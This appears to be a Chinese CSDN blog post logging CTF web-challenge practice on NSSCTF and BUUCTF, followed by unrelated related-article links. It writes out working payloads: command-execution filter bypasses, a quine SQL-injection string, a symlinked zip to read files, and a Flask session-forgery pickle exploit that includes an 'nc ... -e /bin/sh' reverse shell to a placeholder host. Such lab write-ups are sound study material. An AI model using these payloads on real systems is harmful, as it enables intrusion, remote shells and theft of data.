刷题日记 date 6.6

最新推荐文章于 2024-05-31 11:03:01 发布
最新推荐文章于 2024-05-31 11:03:01 发布
阅读量194 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64348326/article/details/131076154
版权

NSSCTF刷题

目录

[HNCTF 2022 Week1]easy_upload

1.添加文件头绕过waf,上传密码为0的shell。
2.过滤system,换成echo+反引号执行命令即可,post执行

0=echo `cat /f*`;

[UUCTF 2022 新生赛]ez_rce

1.过滤了echo,没过滤print,一样能执行,命令过滤用正则或者斜杠绕过都行。

?code=print(`/bin/[b-d]at /fffffffffflagafag `);

[NSSRound#7 Team]ec_RCE

1.引号闭合,直接执行代码读取flag:action=;cat /f*;

[HDCTF 2023]LoginMaster

前面题太基础了,于是挑着做
1.进去后发现只有个登陆框,注册功能是失效的。进入robots.txt发现题目源码。

function checkSql($s) 
{
    if(preg_match("/regexp|between|in|flag|=|>|<|and|\||right|left|reverse|update|extractvalue|floor|substr|&|;|\\\$|0x|sleep|\ /i",$s)){
        alertMes('hacker', 'index.php');
    }
}
if ($row['password'] === $password) {
        die($FLAG);
    } else {
    alertMes("wrong password",'index.php');

2.需要让查询到的密码和输入的密码相等,waf过滤了很多字符,这段代码很明显就是和之前几道题相似,直接一眼quine注入。掏出很久以前写的文档,找到payload,直接输入用户名admin,密码payload就行。

payload:
1'/**/union/**/select/**/replace(replace('1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")/**/as/**/password#',char(34),char(39)),char(46),'1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")/**/as/**/password#')/**/as/**/password#

BUUCTF刷题

[SWPU2019]Web3

1.进入后是个登陆框,随便输入即可登陆,但是upload功能被拒绝了,说是权限不足。f12查看session,用脚本解密,发现权限是1000。

2.这个和linux的权限管理有点类似,最高权限root是1,我们需要将1000修改为1,那就需要找到密钥key。扫了一波目录无果,想去404页面找ssti注入的,结果在响应包发现了base64加密的key:SECRET_KEY:keyqqqwwweee!@#$%^&*

3.拿key生成session,F12替换访问upload,进去后是个文件上传的界面。F12查看源码发现了这段功能代码,也是将上传文件解压到hash生成的目录中,其中的/getflag路由则是记载了flag的存放位置是./flag/flag.jpg

4.一般涉及到python文件上传的基本都是软链接,这题也不例外。当我们上传文件到目录后,会自动访问解压出的文件,我们只需要将文件链接到flag.jpg中即可。由于不知道当前的工作目录,可以使用/proc目录下的/proc/self/cwd/目录,该目录也是一个软链接目录,链接到当前工作目录的。

5.先在linux用命令创建软链接文件ln -s /proc/self/cwd/flag/flag.jpg 2,将其压缩为zipzip --symlinks t.zip 2。最后抓包上传,重发即可在响应包内读取flag。

[HFCTF 2021 Final]easyflask

1.进入file?file=/app/source查看源码,发现/admin路由会pickle.loads(u),很明显的picke序列化。

@app.route('/admin', methods=('GET',))
def admin_handler():
    try:
        u = session.get('u')
        if isinstance(u, dict):
            u = b64decode(u.get('b'))
        u = pickle.loads(u)
    except Exception:
        return 'uhh?'

    if u.is_admin == 1:
        return 'welcome, admin'
    else:
        return 'who are you?'

2.那么就必须要伪造session了,首先查找密钥,读取/proc/self/environ文件发现密钥secret_key=glzjin22948575858jfjfjufirijidjitg3uiiuuh

3.首先先生成反弹shell的payload,然后将其添加到u的b列表中,因为需要先经过base解码。

class cmd():
    def __reduce__(self):
        return (eval,("__import__('os').popen('nc x.x.x.x 2333 -e /bin/sh').read()",))

c = cmd()
c = pickle.dumps(c)
print(base64.b64encode(c))

4.将其加入反弹shell,但是报500错误,而且也没反弹成功。刚开始以为是我的exp有问题,然后又找了网上几个wp的反弹shell也是失效,那么很可能的原因就是靶机没出网,直接将payload替换为命令执行,将读取的flag写入/tmp目录下。

class cmd():
    def __reduce__(self):
        return (eval,("__import__('os').popen('cat /flag > /tmp/yyds').read()",))

c = cmd()
c = pickle.dumps(c)
print(base64.b64encode(c))

5.任意文件读取/file?file=/tmp/yyds,成功读取写入的flag。

光迹ovo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL刷题心得体会
fylqq的博客
09-28 1274
刷题链接 https://www.nowcoder.com/ta/sql?page=0 今天是刷SQL题的第三天,做了如下的笔记,写的比较乱,等我学完了再整理 1.max()函数获取某一元素最大值 count()函数获取某一元素的数量 2.order by 字段名 正排序 order by 字段名 desc 反向排序 排序放在最后 limit a,b 从第a+1开始显示从a+1往后b个...
[UUCTF 2022 新生赛]ez_rce(1),2024年大厂网络安全面经
m0_61549953的博客
04-06 808
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
mysql date default 设置默认值
行者常至
04-28 3万+
`holiday_date` date NOT NULL DEFAULT '1992-09-09' COMMENT '节日的时间' date格式的设置默认值,current_date,current_timestamp等方法好像都不可以的,需要用字符串设置一个默认的日期。 ...
Hive date_format函数入门
鸭梨的博客
02-23 3万+
date_format 的语法: date_format(date/timestamp/string ts, string fmt) 举几个例子 select date_format('2015-04-08', 'y'); 2015 select date_format('2015-04-08', 'yyyy'); 2015 select date_format('2015-04-08', 'yyyy-MM'); 2015-04 select date_format('2015-04-08 10:10:
java long 转换成 Date
09-24 3万+
java long 转换成 Date import java.text.DateFormat; import java.text.SimpleDateFormat; import java.util.Date; public class TestDate { private final DateFormat dateFormat = new SimpleDateFormat("...
postman传递date格式数据
aas3637721的博客
11-23 1万+
1.定义全局变量 postman.setGlobalVariable("createDate",new Date("2019/11/23 10:10:10")); 2.json字符串中引用 "createDate": "{{createDate}}"
DATE_FORMAT函数用法
热门推荐
weixin_41400063的博客
10-18 10万+
DATE_FORMAT函数用法 一、在oracle中,当想把字符串为‘2011-09-20 08:30:45’的格式转化为日期格式,我们可以使用oracle提供的to_date函数。 sql语句为: SELECT to_date('2011-09-20 08:30:45', 'yyyy-MM-dd hh24:mi:ss') FROM dual;                   反之...
Java把String转换成Date类型(Date转换成String类型)
努力,学习!
09-19 9万+
1.String转换成Date类型 SimpleDateFormat ft = new SimpleDateFormat("yyyy-MM-dd"); String time = "2019-09-19"; Date date = ft.parse(time) 2.Date转换成String类型 SimpleDateFormat ft = new SimpleDateFormat("yyyy-M...
TypeScript与Date类型
xuxuan1997的博客
08-24 2万+
js的继承方式  /** * 经典的js寄生组合式继承 */ function MyDate() { Date.apply(this, arguments); this.abc = 1; } function inherits(subClass, superClass) { function Inner() {} Inner.prototype ...
date 日期加一天
小贺的博客
11-16 1万+
date 日期加一天 if(!params.get("aftercreatedate").equals("")){ SimpleDateFormat s=new SimpleDateFormat("yyyy-MM-dd"); Date date=new Date(); try{ date=...
Mac终端date命令
Charliewolf的博客
02-13 1万+
date命令 获取当前本地时间date 获取当前本地时间的时间戳date +%s 将某个时间戳转换为本地时间date -r 1550019314 格式化输出本地时间date +%Y-%m-%d sszxr:~ sszxr$ date 2019年 2月13日 星期三 08时57分41秒 CST sszxr:~ sszxr$ date +%s 1550019466 sszxr:~ sszxr$ dat...
daterangepicker中文示例
12-09
daterangepicker是一个好用的时间范围选择插件,基于jquery,本内容是daterangepicker的中文示例
date_date_
10-02
在C++程序中创建一个关于DATE的类,用于创建日期函数,输入两个值日期1和日期2根据变量输入输出,变量替换,最后输出时间
vue中date函数封装
09-16
封装的时间函数,时间戳转换为年月日可以选择,可以有倒计时,天数展示,需要联系就好,免费
date时间处理工具类
03-14
处理date添加或减少天数 处理date添加或减少月份 处理date添加或减少年份
Linux date命令的使用
09-14
主要介绍了Linux date命令的使用,帮助大家更好的理解和学习Linux,感兴趣的朋友可以了解下
网络安全行为可控定义以及表现内容简述
行云管家
05-28 339
在数字化快速发展的今天,网络安全已成为国家和企业不可或缺的防线。据统计,网络攻击事件频发,给全球经济带来了巨大损失。因此,确保网络安全行为可控显得尤为重要。今天我们来聊聊网络安全行为可控定义以及表现内容。
【网络安全的神秘世界】使用vulhub搭建漏洞测试靶场
weixin_54750312的博客
05-31 207
Vulhub是一个基于docker和的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。
【网络安全的神秘世界】在win11搭建pikachu靶场
最新发布
weixin_54750312的博客
05-31 581
这个错误发生在mysql 5.7 版本及以上版本会出现的问题,在mysql5.7版本默认的sql配置是:sql_mode=“ONLY_FULL_GROUP_BY”,这个配置严格执行了"SQL92标准",很多从5.6升级到5.7时,为了语法兼容,大部分都会选择调整sql_mode,使其保持跟5.6一致,为了尽量兼容程序。访问http://pikachu/install.php,这是pikachu自带的初始化数据库的php文件。ok,重新访问首页(index.php),进行测试,成功解决。点击“安装/初始化”
date invalid date
05-22
"Date invalid date"是一种常见的日期格式错误,表示输入的日期无效。通常情况下,这种错误是由于日期格式不正确或者日期超出了合法范围所导致的。例如,如果你输入了"February 30, 2022",就会出现"Date invalid date"的错误提示,因为二月只有28或29天,而30号并不是一个合法的日期。 如果你在使用某个软件或者网站时遇到了"Date invalid date"的错误提示,建议你检查一下输入的日期格式是否正确,是否超出了合法范围。如果无法确定具体的问题所在,可以尝试与该软件或网站的客服联系,以获取更详细的帮助和解决方案。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值